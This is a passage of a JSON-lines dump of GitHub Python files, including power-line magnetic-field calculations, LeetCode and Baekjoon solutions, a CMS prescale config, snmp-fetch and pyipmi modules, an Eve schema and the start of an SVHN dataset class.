index_dummy = np.where(z_grid == 9999)\n z_grid[index_dummy] = np.unique(z_grid)[-2]\n return x, y, z_grid\n\n\ndef centroid(cables_array, subparser_type):\n '''\n It calculates the abscissa (m) and ordinate (m) of the cables' center of gravity.\n\n Parameters\n -------------------\n cable_array : numpy array\n First column - Current phase belonging to the n-th cable under consideration\n Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n subparser_type : str\n Parsed argument, indicating the subparser called in the command line.\n\n Returns\n -------------------\n xg, yg : float\n Abscissa (m) and ordinate (m) of the cables' center of gravity\n '''\n num_cables = 3\n iter_triad = _which_iterator(subparser_type)\n coord_sum = np.nansum(np.sum(cables_array, axis=1), axis=0)\n x_sum, y_sum = coord_sum[1], coord_sum[2]\n xg, yg = x_sum/(num_cables*iter_triad), y_sum/(num_cables*iter_triad)\n return xg, yg\n\n\ndef is_underground(cables_array, subparser_type):\n '''\n It checks if the cables' configuration is underground, that is: the cables are extremely close to each other (i.e. 
closer than 0.5 meters to each other).\n    If so, it sets the parameters of the space subdivision operated through the \"linspace\" function.\n\n    Parameters\n    -------------------\n    cable_array : numpy array\n        First column - Current phase belonging to the n-th cable under consideration\n        Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n    subparser_type : str\n        Parsed argument, indicating the subparser called in the command line.\n\n    Returns\n    -------------------\n    delta, nx : int\n        The unilateral distance (m) that will be used along x and y axis to investigate the surrounding of the point of interest.\n        Number of intervals into which the bilateral distances to investigate (having xp, yp as the middle point) will be divided.\n\n    Notes\n    -------------------\n    To check if the cables are underground the relative distance is used, instead of just checking the ordinates (that should be negative).\n    This is because, hypothetically, the reference system origin could be put anywhere.\n    For convenience, the documentation strongly recommends where to place this origin.\n    '''\n\n    iter_triad = _which_iterator(subparser_type)\n    num_cables = 3\n\n    for j in range(iter_triad):\n        for i in range(num_cables):\n            if np.linalg.norm(np.array((cables_array[j, i-1, 1], cables_array[j, i-1, 2]))-np.array((cables_array[j, i, 1], cables_array[j, i, 2]))) < 0.5:\n                # a single close pair is enough to mark the configuration as underground\n                return 6, 121\n    return 35, 71\n\n\ndef lim_val_checker(xg, x, nx, z_array, lim_val):\n    '''\n    It checks on both sides of the trellis at which abscissa (m) the given limit value (microTesla) is exceeded.\n    The ordinate (m) at which the computation is done is fixed and it corresponds to yg, the cables' center of gravity.\n\n    Parameters\n    -------------------\n    xg : float\n        Abscissa (m) of the cables' center of gravity\n    x, z_array : numpy.ndarray\n        (1D) Abscissas (m) having the cables' center of gravity xg in their center and (1D) B values corresponding to the (x,yg) couples\n    nx : int\n        Number of intervals into which the bilateral distances to investigate (having xg, yg as the middle point) will be divided\n    lim_val : list of float\n        MicroTesla value at which is estimated the DPA (distanza di prima approssimazione)\n\n    Returns\n    -------------------\n    dpa_value : float\n        Value of the estimated DPA (distanza di prima approssimazione) at the given limit value\n    '''\n\n    dpa_left_right = np.zeros(2)\n    for i in range(nx-1):\n        if z_array[i] <= lim_val < z_array[i+1]:\n            dpa_left_right[0] = xg-x[i]\n        if z_array[i] > lim_val >= z_array[i+1]:\n            dpa_left_right[1] = x[i+1]-xg\n    dpa_value = np.max(dpa_left_right)\n    return dpa_value\n\n\n
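# Hand-checked illustration (numbers assumed): with xg=0, x=[-2,-1,0,1,2] and\n# z_array=[1,5,9,5,1], lim_val=3 crosses upward between x[0] and x[1] and downward\n# between x[3] and x[4], so lim_val_checker returns max(0-(-2), 2-0) = 2.0.\n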
def main_dpa(current_s, diam_cables, cables_array, subparser_type, lim_val):\n    '''\n    It calculates the DPA (distanza di prima approssimazione - meters) at the given limit value (microTesla).\n    A single value is provided, meaning a symmetrical DPA with respect to the cables' center of gravity abscissa xg.\n\n    Parameters\n    -------------------\n    current_s : numpy.ndarray\n        Current (A) circulating inside the considered power line/lines\n        (each one composed of a triad of cables)\n    diam_cables : float\n        Diameter (m) of the cables in use\n    cable_array : numpy array\n        First column - Current phase belonging to the n-th cable under consideration\n        Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n    subparser_type : str\n        Parsed argument, indicating the subparser called in the command line.\n    lim_val : list of float\n        MicroTesla value at which is estimated the DPA (distanza di prima approssimazione)\n\n    Returns\n    -------------------\n    dpa_value : float\n        Value of the estimated DPA (distanza di prima approssimazione) at the given limit value\n    '''\n    xg, yg = centroid(cables_array, subparser_type)\n    delta, nx = is_underground(cables_array, subparser_type)\n\n    x = np.linspace(xg-delta, xg+delta, nx)\n    y = yg\n    z_array = np.zeros(nx)\n    for i in range(nx):\n        z_array[i] = main_point(current_s, x[i], y, diam_cables, cables_array, subparser_type)\n\n    dpa_value = lim_val_checker(xg, x, nx, z_array, lim_val)\n    return dpa_value\n\n\ndef main_print_point_bidim_dpa(current_s, xp, yp, diam_cables, cables_array, args, file=None):\n    '''\n    Utility function that groups the calls to 'point', 'bidim' and 'dpa' CL optional arguments and prints the respective output.\n\n    Print's 'file' keyword argument is made explicit so that it can be replaced with the selected destination file\n    in case the \"save\" CL optional argument is invoked.\n\n    Parameters\n    -------------------\n    current_s : numpy.ndarray\n        Current (A) circulating inside the considered power line/lines\n        (each one composed of a triad of cables)\n    xp, yp : float\n        Abscissa (m) and ordinate (m) of the point of interest where\n        the magnetic induction field B will be calculated at last\n    diam_cables : float\n        Diameter (m) of the cables in use\n    cable_array : numpy array\n        First column - Current phase belonging to the n-th cable under consideration\n        Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n    args : argparse.Namespace\n        Namespace object built up from attributes parsed out of the command line\n    file : opened file, default=None\n        Destination file of all the print statements\n\n    Returns\n    -------------------\n    None\n    '''\n\n    if args.point:\n        B_point = main_point(current_s, xp, yp, diam_cables, cables_array, args.subparser)\n        print('\\nIn point of coordinates (', xp, ',', yp, '), the magnetic induction is ', round(B_point, 2), ' microTesla.\\n', file=file)\n\n    if args.bidim:\n        B_grid = main_grid(current_s, xp, yp, diam_cables, cables_array, args.subparser)\n        print('''\\n------Grid of B field values (microTesla)------\\n----Point of interest in the matrix center-----\\n\\n''', np.flipud(B_grid[2]), file=file)\n        # with the flip up-down you see the matrix as if it were an xy grid\n\n    if args.dpa:\n        dpa_value = main_dpa(current_s, diam_cables, cables_array, args.subparser, args.dpa)\n        print('\\nThe value of the DPA (Distanza di Prima Approssimazione) is ', round(dpa_value, 1), ' meters from the cables\\' center of gravity abscissa.\\n', file=file)\n","repo_name":"ElenaFusillo/ELFproject","sub_path":"B_field/calculations.py","file_name":"calculations.py","file_ext":"py","file_size_in_byte":16847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"38764415649","text":"# Runtime: 228 ms, faster than 40.25% of Python3 online submissions for Kth Smallest Element in a Sorted Matrix.\n# Memory Usage: 18.8 MB, less than 9.09% of Python3 online submissions for Kth Smallest Element in a Sorted Matrix.\n\nfrom heapq import *\nclass Solution:\n    def kthSmallest(self, matrix: List[List[int]], k: int) -> int:\n        '''Method 1: use pointer\n        Time: O(kn)\n        Space: O(n)'''\n        # n = len(matrix)\n        # ids = [0] * n\n        # min_row = -1\n        # while k:\n        #     ans = (float('inf'), -1)\n        #     for row in range(n):\n        #         if ids[row] >= n:\n        #             continue\n        #         if (matrix[row][ids[row]], row) < ans:\n        #             min_row = row\n        #             ans = (matrix[row][ids[row]], row)\n        #     # print(min_row, k, ids, 
ans)\n        #     ids[min_row] += 1\n        #     k -= 1\n        # return ans[0]\n        \n        '''Method 2: use min-heap\n        Time: O(min(n, k)) heapify + O(k log n) heap pop\n        Space: O(min(n, k))'''\n        heap = []\n        for row in range(min(k, len(matrix))):\n            # matrix[row].reverse()\n            # heappush(heap, (matrix[row].pop(), row))\n            heappush(heap, (matrix[row][0], row, 0))\n        while k:\n            num = heappop(heap)\n            # if matrix[num[1]]:\n            #     heappush(heap, (matrix[num[1]].pop(), num[1]))\n            if num[2] != len(matrix) - 1:\n                heappush(heap, (matrix[num[1]][num[2] + 1], num[1], num[2] + 1))\n            k -= 1\n        return num[0]","repo_name":"coldmanck/leetcode-python","sub_path":"0378_Kth_Smallest_Element_in_a_Sorted_Matrix.py","file_name":"0378_Kth_Smallest_Element_in_a_Sorted_Matrix.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"}
{"seq_id":"40160802840","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"TEST\")\n\n\n# instantiate & configure message logger service\nprocess.MessageLogger = cms.Service(\"MessageLogger\",\n    cerr = cms.untracked.PSet(\n        enable = cms.untracked.bool(False)\n    ),\n    cout = cms.untracked.PSet(\n        enable = cms.untracked.bool(True),\n        threshold = cms.untracked.string('INFO')\n    )\n)\n\n\n# define prescale table: three rows (paths), three columns (scenarios)\nprescaleTable = cms.VPSet(\n    cms.PSet(\n        pathName = cms.string('HLT2'),\n        prescales = cms.vuint32(2, 5, 10)\n    ), \n    cms.PSet(\n        pathName = cms.string('HLT3'),\n        prescales = cms.vuint32(5, 10, 20)\n    ), \n    cms.PSet(\n        pathName = cms.string('HLT4'),\n        prescales = cms.vuint32(10, 20, 0)\n    )\n)\n\n\n# instantiate prescale service and configure with above defined table\nprocess.load(\"FWCore.PrescaleService.PrescaleService_cfi\")\nprocess.PrescaleService.prescaleTable = prescaleTable\nprocess.PrescaleService.lvl1Labels = cms.vstring('10E30','10E31','10E32')\nprocess.PrescaleService.lvl1DefaultLabel = cms.string('10E31')\n\n\n# empty source for testing\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(100))\nprocess.source = cms.Source(\"EmptySource\")\n\n\n# define modules\nprocess.psHLT1 = cms.EDFilter(\"HLTPrescaler\", \n    L1GtReadoutRecordTag = cms.InputTag('source')\n)\n\nprocess.psHLT2 = cms.EDFilter(\"HLTPrescaler\", \n    L1GtReadoutRecordTag = cms.InputTag('source')\n)\n\nprocess.psHLT3 = cms.EDFilter(\"HLTPrescaler\", \n    L1GtReadoutRecordTag = cms.InputTag('source')\n)\n\nprocess.psHLT4 = cms.EDFilter(\"HLTPrescaler\", \n    L1GtReadoutRecordTag = cms.InputTag('source')\n)\n\n\n\n# define paths\nprocess.HLT1 = cms.Path(process.psHLT1)\nprocess.HLT2 = cms.Path(process.psHLT2)\nprocess.HLT3 = cms.Path(process.psHLT3)\nprocess.HLT4 = cms.Path(process.psHLT4)\n","repo_name":"cms-sw/cmssw","sub_path":"FWCore/PrescaleService/test/testPrescaleService_cfg.py","file_name":"testPrescaleService_cfg.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"}
{"seq_id":"15415323333","text":"\"\"\"Variable bindings.\"\"\"\n\nimport inspect\nimport pprint\nfrom collections import defaultdict\nfrom functools import partial, reduce\nfrom operator import attrgetter, methodcaller\nfrom typing import Any, Callable, DefaultDict, Dict, Optional, Sequence, Text, Tuple, cast\n\nimport numpy as np\nimport pandas as pd\nfrom toolz.functoolz import compose\n\nfrom .fp.maybe import Just, Maybe, Nothing\nfrom .utils import concatv_dtypes, convert_oid, dtype_array, dtype_fields, 
validate_oid\n\nNULL_VAR_BIND_T = Tuple[Sequence[int], Tuple[int, int]] # pylint: disable=invalid-name\n\n\nclass MetaObjectType(type):\n \"\"\"Metaclass for ObjectTypes.\"\"\"\n\n index: Optional[np.dtype] = None\n dtype: Optional[np.dtype] = None\n _parent: Maybe['MetaObjectType'] = Nothing()\n _children: Dict[Text, 'MetaObjectType']\n _oid: Maybe[Text] = Nothing()\n _hooks: DefaultDict[Text, Sequence[Callable[[Any], Any]]]\n\n def __init__(\n cls, class_name: Text, bases: Tuple[type, ...], attrs: Dict[Text, Any]\n ) -> None:\n \"\"\"Initialize ObjectType.\"\"\"\n super().__init__(class_name, bases, attrs)\n Maybe.from_optional(cls.index).fmap(dtype_fields).fmap(methodcaller('throw'))\n Maybe.from_optional(cls.dtype).fmap(dtype_fields).fmap(methodcaller('throw'))\n cls._parent.fmap(methodcaller('_append_child', cls))\n cls._children = {}\n cls._oid.fmap(validate_oid)\n valid_hooks = [\n 'before_view',\n 'after_view',\n 'before_pivot',\n 'before_merge',\n 'after_merge'\n ]\n cls._hooks = defaultdict(list)\n for _, v in inspect.getmembers(cls, predicate=inspect.isfunction):\n _hook = getattr(v, '__hook__', None)\n if _hook is not None:\n if _hook not in valid_hooks:\n raise ValueError(f\"hook '{_hook}' is not a valid hook: {valid_hooks}\")\n cls._hooks[_hook] = [v, *cls._hooks[_hook]]\n\n def _append_child(cls, child: 'MetaObjectType') -> None:\n \"\"\"Append a child ObjectType to this ObjectType.\"\"\"\n cls._children['.'.join([child.__module__, child.__qualname__])] = child\n\n _header_dtype = Just(np.dtype([\n ('#index', np.uint64),\n ('#oid_size', np.uint64),\n ('#result_size', np.uint64),\n ('#result_type', np.uint64),\n ('#timestamp', 'datetime64[s]'),\n ]))\n\n @property\n def _oid_dtype(cls) -> Maybe[np.dtype]:\n \"\"\"Get the oid dtype.\"\"\"\n return (\n cls._oid\n .fmap(convert_oid)\n .fmap(len)\n .bind(partial(dtype_array, np.dtype(np.uint64)))\n .fmap(lambda x: np.dtype([('#oid', x)]))\n )\n\n @property\n def _index(cls) -> Maybe[np.dtype]:\n # pylint: disable=no-member\n \"\"\"Get the index dtype.\"\"\"\n return Maybe.from_optional(cls.index)\n\n @property\n def _dtype(cls) -> Maybe[np.dtype]:\n \"\"\"Get the value dtype.\"\"\"\n return Maybe.from_optional(cls.dtype)\n\n @property\n def _matrix(cls) -> Sequence[Sequence['MetaObjectType']]:\n \"\"\"Expand the tree of ObjectTypes into a matrix of ObjectTypes.\"\"\"\n if not cls._children:\n return [[cls]]\n return [\n [cls, *col]\n for child in cls._children.values()\n for col in child._matrix # pylint: disable=protected-access\n ]\n\n def null_var_binds(\n cls, param: Optional[Text] = None\n ) -> Sequence[NULL_VAR_BIND_T]:\n \"\"\"Get a description of null variable bindings to be filled.\"\"\"\n def _check(null_var_bind: NULL_VAR_BIND_T) -> NULL_VAR_BIND_T:\n for size in null_var_bind[1]:\n if size % 8 != 0:\n raise RuntimeError(f'dtype must be 64bit aligned: {null_var_bind}')\n return null_var_bind\n\n def _node_null_var_binds(_cls: MetaObjectType) -> NULL_VAR_BIND_T:\n # pylint: disable=protected-access, no-member #1127\n return (\n _cls._oid.fmap(convert_oid).from_maybe([]),\n (\n _cls._oid_dtype.fmap(attrgetter('itemsize')).from_maybe(0) +\n _cls._index.fmap(attrgetter('itemsize')).from_maybe(0),\n _cls._dtype.fmap(attrgetter('itemsize')).from_maybe(0)\n )\n )\n\n def _concat_null_var_binds(a: NULL_VAR_BIND_T, b: NULL_VAR_BIND_T) -> NULL_VAR_BIND_T:\n return ([*a[0], *b[0]], (a[1][0] + b[1][0], a[1][1] + b[1][1]))\n\n param_null_var_bind = (\n Maybe.from_optional(param).fmap(convert_oid).from_maybe([]),\n (0, 0)\n )\n\n if 
cls.dtype is not None:\n            if cls._children:\n                raise RuntimeError(\n                    'ObjectType with a value dtype has children: '\n                    f'cls={cls.__name__}: dtype={cls.dtype}: children={cls._children}'\n                )\n            return [_check(_concat_null_var_binds(_node_null_var_binds(cls), param_null_var_bind))]\n\n        matrix = cls._matrix\n\n        index_set = {\n            Maybe.reduce(concatv_dtypes, map(attrgetter('_index'), col))\n            for col in matrix  # pylint: disable=not-an-iterable\n        }\n\n        if len(index_set) not in {0, 1}:\n            raise RuntimeError(f'ObjectTypes do not share common index: {index_set}')\n\n        return [\n            _check(reduce(\n                _concat_null_var_binds,\n                [*map(_node_null_var_binds, col), param_null_var_bind]\n            ))\n            for col in matrix  # pylint: disable=not-an-iterable\n        ]\n\n    def _view(cls, arr: np.ndarray, col: Sequence['MetaObjectType']) -> Any:\n        oid_dtype = (\n            dtype_array(\n                np.dtype(np.uint64),\n                sum(map(len, Maybe.cat(map(\n                    lambda x: x._oid.fmap(convert_oid), col  # pylint: disable=protected-access\n                ))))\n            )\n            .fmap(lambda x: np.dtype([('#oid', x)]))\n        )\n        index_dtype = Maybe.reduce(concatv_dtypes, map(attrgetter('_index'), col))\n        value_dtype = Maybe.reduce(concatv_dtypes, map(attrgetter('_dtype'), col))\n        view_dtype = Maybe.reduce(\n            concatv_dtypes, [cls._header_dtype, oid_dtype, index_dtype, value_dtype]\n        )\n\n        arr = reduce(lambda acc, var_bind: cast(\n            np.ndarray,\n            compose(*var_bind._hooks['before_view'])(acc)  # pylint: disable=protected-access\n        ), col, arr)\n        arr = view_dtype.fmap(arr.view).from_maybe(arr)  # type: ignore\n        arr = reduce(lambda acc, var_bind: cast(\n            np.ndarray,\n            compose(*var_bind._hooks['after_view'])(acc)  # pylint: disable=protected-access\n        ), col, arr)\n\n        df = pd.DataFrame.from_records(\n            arr.tolist(), columns=arr.dtype.names\n        )\n\n        # clean up dtypes of empty result\n        if arr.size == 0:\n            if isinstance(view_dtype, Just) and view_dtype.value.fields is not None:\n                for column, dtype in view_dtype.value.fields.items():\n                    try:\n                        df[column] = df[column].astype(dtype[0])\n                    except ValueError:\n                        df[column] = df[column].astype(object)\n\n        df = reduce(lambda acc, var_bind: (\n            compose(*var_bind._hooks['before_pivot'])(acc)  # pylint: disable=protected-access\n        ), col, df)\n\n        if df.index.names is not None and [i for i in df.index.names if i is not None]:\n            df = df.reset_index().set_index(['#index', *df.index.names])\n        else:\n            df = df.set_index('#index')\n\n        return (\n            df.drop(columns={\n                '#oid_size', '#result_size', '#result_type', '#oid'\n            }.intersection(df.columns))\n        )\n\n    @staticmethod\n    def _pivot(a: Any, b: Any) -> Any:  # type: ignore\n        \"\"\"Pivot two ObjectType columns into a DataFrame.\"\"\"\n        df = pd.merge(a, b, how='outer', left_index=True, right_index=True)\n        df['#timestamp'] = (\n            df[['#timestamp_x', '#timestamp_y']]\n            .max(axis=1)\n            .astype('datetime64[s]')\n        )\n        return df.drop(columns=['#timestamp_x', '#timestamp_y'])\n\n    def to_pandas(\n            cls, response: Sequence[np.ndarray], data: Optional[Any] = None,\n            index: Optional[Sequence[Text]] = None\n    ) -> Any:\n        # pylint: disable=no-value-for-parameter\n        \"\"\"Combine the response arrays into a single pandas DataFrame.\"\"\"\n        matrix = cls._matrix\n        df = reduce(cls._pivot, [cls._view(arr, col) for arr, col in zip(response, matrix)])\n        df['#timestamp'] = df['#timestamp'].dt.tz_localize('UTC')\n        df = df.reset_index().set_index('#index')\n        df, data = reduce(\n            lambda acc, var_bind: cast(\n                Tuple[Any, Optional[Any]],\n                compose(*var_bind._hooks['before_merge'])(acc)  # pylint: disable=protected-access\n            ),\n            [var_bind for col in matrix for var_bind in col],  # pylint: disable=not-an-iterable\n            (df, data)\n        )\n        
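# a caller-supplied frame, if any, is outer-merged on the shared index\n        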
if data is not None:\n df = df.merge(data, how='outer', left_index=True, right_index=True)\n df = df.reset_index(drop=True)\n if index is not None:\n df = df.set_index(index)\n df = reduce(\n lambda acc, var_bind: (\n compose(*var_bind._hooks['after_merge'])(acc) # pylint: disable=protected-access\n ),\n [var_bind for col in matrix for var_bind in col], # pylint: disable=not-an-iterable\n df\n )\n return df\n\n @property\n def description(cls) -> Text:\n \"\"\"Return string representation.\"\"\"\n pp = pprint.PrettyPrinter(indent=4, width=60)\n\n def dtype_description(\n label: Text, dtype: Maybe[np.dtype], indent: int = 16\n ) -> Sequence[Text]:\n def _dtype_description() -> Sequence[Text]:\n lines = (\n dtype.fmap(dtype_fields)\n .fmap(lambda x: pp.pformat(dict(x.throw())).split('\\n'))\n .from_maybe([])\n )\n return '\\n'.join(lines[:1] + [' ' * indent + line for line in lines[1:]])\n return (\n dtype.fmap(lambda x: [f'{label:{indent}s}{_dtype_description()}'])\n .from_maybe([])\n )\n\n def var_bind_description() -> Sequence[Text]:\n return (\n Maybe.from_optional(cls.__doc__)\n .fmap(lambda x: ['DESCRIPTION'] + [\n f' {line}' for line in x.split('\\n')\n ])\n .from_maybe([])\n )\n\n def parent_description() -> Text:\n return (\n '::= { ' + (\n cls._parent\n .bind(lambda x: Maybe.from_optional(x.__name__))\n .combine(lambda x: lambda y: ' '.join([x, y]), cls._oid)\n .from_maybe('')\n ) + ' }'\n )\n\n def children_sequence_description() -> Sequence[Text]:\n if len(cls._children) > 1:\n return (\n [f'\\n{cls.__name__} ::= SEQUENCE {{'] +\n [f' {child.__name__}' for child in cls._children.values()] +\n ['}']\n )\n return []\n\n def children_description() -> Sequence[Text]:\n return ['\\n'+child.description for child in cls._children.values()]\n\n return '\\n'.join([\n f'{cls.__name__} OBJECT-TYPE', *[\n f' {line}' for line in [\n *dtype_description('BASE_TYPE', cls._dtype),\n *dtype_description('INDEX', cls._index),\n *var_bind_description(),\n parent_description()\n ]\n ],\n *children_sequence_description(),\n *children_description()\n ])\n\n def describe(cls) -> None:\n \"\"\"Print the variable binding description.\"\"\"\n print(cls.description)\n\n\nclass ObjectType(metaclass=MetaObjectType):\n # pylint: disable=too-few-public-methods\n \"\"\"ObjectType definition.\"\"\"\n\n def __attrs_post_init__(self) -> None:\n # pylint: disable=no-self-use\n \"\"\"Raise error if type instance is created.\"\"\"\n raise RuntimeError(\n 'ObjectType is used for type level programming only; instances are not allowed'\n )\n","repo_name":"higherorderfunctor/snmp-fetch","sub_path":"snmp_fetch/object_type.py","file_name":"object_type.py","file_ext":"py","file_size_in_byte":12433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40055193436","text":"# Time: O(n)\n# Space: O(1)\n\n# Ideas:\n#\n\n\nclass Solution:\n def containsNearbyAlmostDuplicate(self, nums: 'List[int]', k: int, t: int) -> bool:\n if t < 0: return False\n lookup = {}\n for i in range(len(nums)):\n b_idx = nums[i] // (t + 1)\n if b_idx in lookup:\n return True\n if b_idx - 1 in lookup and abs(nums[i] - lookup[b_idx - 1]) < t + 1:\n return True\n if b_idx + 1 in lookup and abs(nums[i] - lookup[b_idx + 1]) < t + 1:\n return True\n lookup[b_idx] = nums[i]\n if i >= k: del lookup[nums[i - k] // (t + 1)]\n return 
False\n","repo_name":"sevenhe716/LeetCode","sub_path":"Array/q220_contains_duplicate_iii.py","file_name":"q220_contains_duplicate_iii.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"72830977116","text":"import re\n\nfrom .. import Command\nfrom .. sdr import Sdr, AnalogSdr\nfrom pyipmi.tools.responseparser import ResponseParserMixIn\n\nclass SdrListCommand(Command, ResponseParserMixIn):\n    \"\"\"Describes the sdr list command\n\n    This is not a single IPMI request type - it's an ipmitool\n    command that's composed of multiple IPMI requests.\n    \"\"\"\n\n    name = 'SDR List'\n    result_type = Sdr\n\n    response_parser = ResponseParserMixIn.parse_colon_record_list\n    ipmitool_args = ['-v', 'sdr', 'list', 'all']\n\n    def sensor_name_parser(string):\n        return string.split('(')[0].strip()\n\n    def entity_id_parser(string):\n        m = re.search('(\\\\d.\\\\d{1,2})', string)\n        return m.groups()[0]\n\n    def get_response_types(self, record):\n        \"\"\"Only matches Analog sensors right now.\n\n        There are several more types of records to match, if they\n        are needed.\n        \"\"\"\n        if re.search('Sensor Type \\\\(Analog\\\\)', record):\n            return AnalogSdr, self.analog_response_fields\n        else:\n            return None, None\n\n    \"\"\"\n    Unparsed fields for analog sensors:\n\n    Readable Thresholds : lnr lcr lnc unc ucr unr \n    Settable Thresholds : lnr lcr lnc unc ucr unr \n    Threshold Read Mask : lnr lcr lnc unc ucr unr \n    Assertion Events : \n    Assertions Enabled : unc+ ucr+ unr+ \n    Deassertions Enabled : unc+ ucr+ unr+\n    \"\"\"\n    analog_response_fields = {\n        'Sensor ID' : {\n            'attr' : 'sensor_name',\n            'parser' : sensor_name_parser\n        },\n        'Entity ID' : {\n            'attr' : 'entity_id',\n            'parser' : entity_id_parser\n        },\n        'Sensor Type (Analog)' : { 'attr' : 'sensor_type' },\n        'Sensor Reading' : {},\n        'Status' : {},\n        'Nominal Reading' : {},\n        'Normal Minimum' : {},\n        'Normal Maximum' : {},\n        'Upper non-recoverable' : {},\n        'Upper critical' : {},\n        'Upper non-critical' : {},\n        'Lower non-recoverable' : {},\n        'Lower critical' : {},\n        'Lower non-critical' : {},\n        'Positive Hysteresis' : {},\n        'Negative Hysteresis' : {},\n        'Minimum sensor range' : {},\n        'Maximum sensor range' : {},\n        'Event Message Control' : {},\n    }\n\nsdr_commands = {\n    \"get_sdr_list\" : SdrListCommand\n}\n","repo_name":"Cynerva/pyipmi","sub_path":"pyipmi/commands/sdr.py","file_name":"sdr.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"}
{"seq_id":"13988552711","text":"## Author: Luca Pescatore\n## Mail: pluca@cern.ch\n## Description: extends the standard string.format() to handle cases where the key is not present.\n\nimport string\nfrom ROOT import *\n\nclass PartialFormatter(string.Formatter):\n    def __init__(self, missing='--', bad_fmt='!!'):\n        self.missing, self.bad_fmt=missing, bad_fmt\n\n    def get_field(self, field_name, args, kwargs):\n        \n        try:\n            val=super(PartialFormatter, self).get_field(field_name, args, kwargs)\n        except (KeyError, AttributeError):\n            val=None,field_name \n        return val \n\n    def format_field(self, value, spec):\n        # handle an invalid format\n        if value is None: return self.missing\n        try:\n            return super(PartialFormatter, self).format_field(value, spec)\n        except ValueError:\n            if self.bad_fmt is not None: return self.bad_fmt \n            else: raise\n\n\n\n\n
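# Illustrative behaviour (hand-checked, not from the original file):\n# PartialFormatter().format('{a} {b}', a=1) returns '1 --' because the missing\n# key 'b' falls back to the placeholder.\n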
:\n        ratio = num / den\n        ratioE = ratio * TMath.Sqrt(TMath.Power(numE / num, 2) + TMath.Power(denE / den, 2))\n    \n    return ratio, ratioE\n\ndef multiply(num, numE, den, denE) :\n    prod = 0\n    prodE = 0\n    \n    if (den != 0.) : \n        prod = num * den\n        prodE = prod * TMath.Sqrt(TMath.Power(numE / num, 2) + TMath.Power(denE / den, 2))\n    \n    return prod, prodE\n\n\n","repo_name":"lucapescatore88/SciFiTestBeamSimulation","sub_path":"job/utils/formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"33215451488","text":"import sys\n\ns = sys.stdin.readline().rstrip()\nwords = []\ncursor = 0\nis_tag = False\ntmp = ''\nwhile cursor < len(s):\n    if s[cursor] == '<':\n        # a tag starts\n        if tmp:\n            tmp = tmp[::-1]\n            words.append(tmp)\n            tmp = ''\n            # if a word was read before the tag, reverse it and store it first\n        is_tag = True\n        tmp += s[cursor]\n    elif s[cursor] == '>':\n        is_tag = False\n        tmp += s[cursor]\n        words.append(tmp)\n        tmp = ''\n        # the tag is finished: everything up to '<_>' has been read\n    elif is_tag:\n        tmp += s[cursor]\n    elif not is_tag and s[cursor] != ' ':\n        tmp += s[cursor]\n        # reading a word that is not part of a tag\n    elif not is_tag and s[cursor] == ' ':\n        tmp = tmp[::-1]\n        words.append(tmp)\n        words.append(' ')\n        tmp = ''\n        # finished reading a non-tag word: reverse it before storing.\n        # the space is stored separately.\n    cursor += 1\ntmp = tmp[::-1]\nwords.append(tmp)\n# if a word is still left at the end, reverse it and store it as well\nprint(*words, sep='')","repo_name":"PJunyeong/Coding-Test","sub_path":"Baekjoon/17413_단어 뒤집기 2.py","file_name":"17413_단어 뒤집기 2.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18897001013","text":"# Our API will expose resource (MongoDB collections): 'online'.\n# In order to allow for proper data validation, we define behaviour\n# and structure.\nonline = {\n    # 'title' tag used in item links.\n    'item_title': 'online',\n\n    # most global settings can be overridden at resource level\n    #'resource_methods': ['GET', 'POST', 'PUT'],\n\n    # Schema definition, based on Cerberus grammar. 
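# The divide()/multiply() helpers in formatter.py above propagate relative
# uncertainties in quadrature: for r = a / b, sigma_r = |r| * sqrt((sigma_a/a)^2
# + (sigma_b/b)^2). A quick numeric check without the ROOT/TMath dependency
# (the input values are made up):
import math

def divide_with_error(a, da, b, db):
    # same quadrature rule as divide() above, using the standard library
    if b == 0.0:
        return 0.0, 0.0
    r = a / b
    dr = abs(r) * math.sqrt((da / a) ** 2 + (db / b) ** 2)
    return r, dr

r, dr = divide_with_error(10.0, 0.5, 4.0, 0.2)  # 5% relative error on each input
print(r, dr)  # 2.5 +/- ~0.177 (= 2.5 * sqrt(2) * 0.05)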
Check the Cerberus project\n # (https://github.com/nicolaiarocci/cerberus) for details.\n 'schema': {\n 'users': {\n 'type': 'objectid',\n 'data_relation': {\n 'resource': 'users',\n 'field': '_id',\n 'embeddable': True\n }\n },\n # sha1, plze add salt\n 'token': {\n 'type': 'string',\n 'minlength': 20,\n 'maxlength': 20\n }\n }\n}\n","repo_name":"arvin-chou/mc","sub_path":"module/user/onlineMapping.py","file_name":"onlineMapping.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18897001013","text":"# SVHN number transcription as in http://arxiv.org/pdf/1312.6082v4.pdf\nimport os\n\nimport numpy as np\n\nimport theano\nimport theano.tensor as T\n\nfrom blocks.bricks.base import application\nfrom blocks.filter import VariableFilter\n\nfrom fuel.transformers import Mapping\nfrom fuel.datasets import H5PYDataset\n\nimport bricks\nimport initialization\n\nimport tasks\nimport masonry\n\nclass SVHN(H5PYDataset):\n def __init__(self, **kwargs):\n kwargs.setdefault('load_in_memory', True)\n super(SVHN, self).__init__(\n os.path.join(os.environ[\"SVHN\"], \"dataset_64_gray.h5\"),\n **kwargs)\n\nclass 